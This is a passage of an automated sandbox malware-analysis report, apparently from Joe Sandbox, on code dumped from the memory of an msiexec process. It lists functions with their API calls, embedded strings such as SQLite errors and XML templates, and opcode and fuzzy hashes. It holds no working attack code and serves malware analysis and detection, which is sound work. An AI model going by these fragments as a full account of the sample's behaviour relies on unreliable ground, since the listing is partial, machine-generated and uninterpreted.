                                                                                                                                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                • memset.MSVCRT ref: 00405455
                                                                                                                                                • memset.MSVCRT ref: 0040546C
                                                                                                                                                • memset.MSVCRT ref: 00405483
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                                                                                • String ID: 6$\
                                                                                                                                                • API String ID: 404372293-1284684873
                                                                                                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesErrorFileLastSleep$free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1470729244-0
                                                                                                                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1331804452-0
                                                                                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: advapi32.dll
                                                                                                                                                • API String ID: 2012295524-4050573280
                                                                                                                                                • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                • <%s>, xrefs: 004100A6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                • API String ID: 999028693-502967061
                                                                                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                • memset.MSVCRT ref: 00408E46
                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2350177629-0
                                                                                                                                                • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                • API String ID: 2221118986-1606337402
                                                                                                                                                • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                • memset.MSVCRT ref: 00408FD4
                                                                                                                                                • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                • memset.MSVCRT ref: 00409042
                                                                                                                                                • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 265355444-0
                                                                                                                                                • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                • API String ID: 2618321458-3614832568
                                                                                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFilefreememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2507021081-0
                                                                                                                                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                • free.MSVCRT ref: 00417544
                                                                                                                                                • free.MSVCRT ref: 00417562
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4131324427-0
                                                                                                                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                • free.MSVCRT ref: 0041822B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PathTemp$free
                                                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                                                • API String ID: 924794160-1420421710
                                                                                                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                                                • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                • API String ID: 0-1953309616
                                                                                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
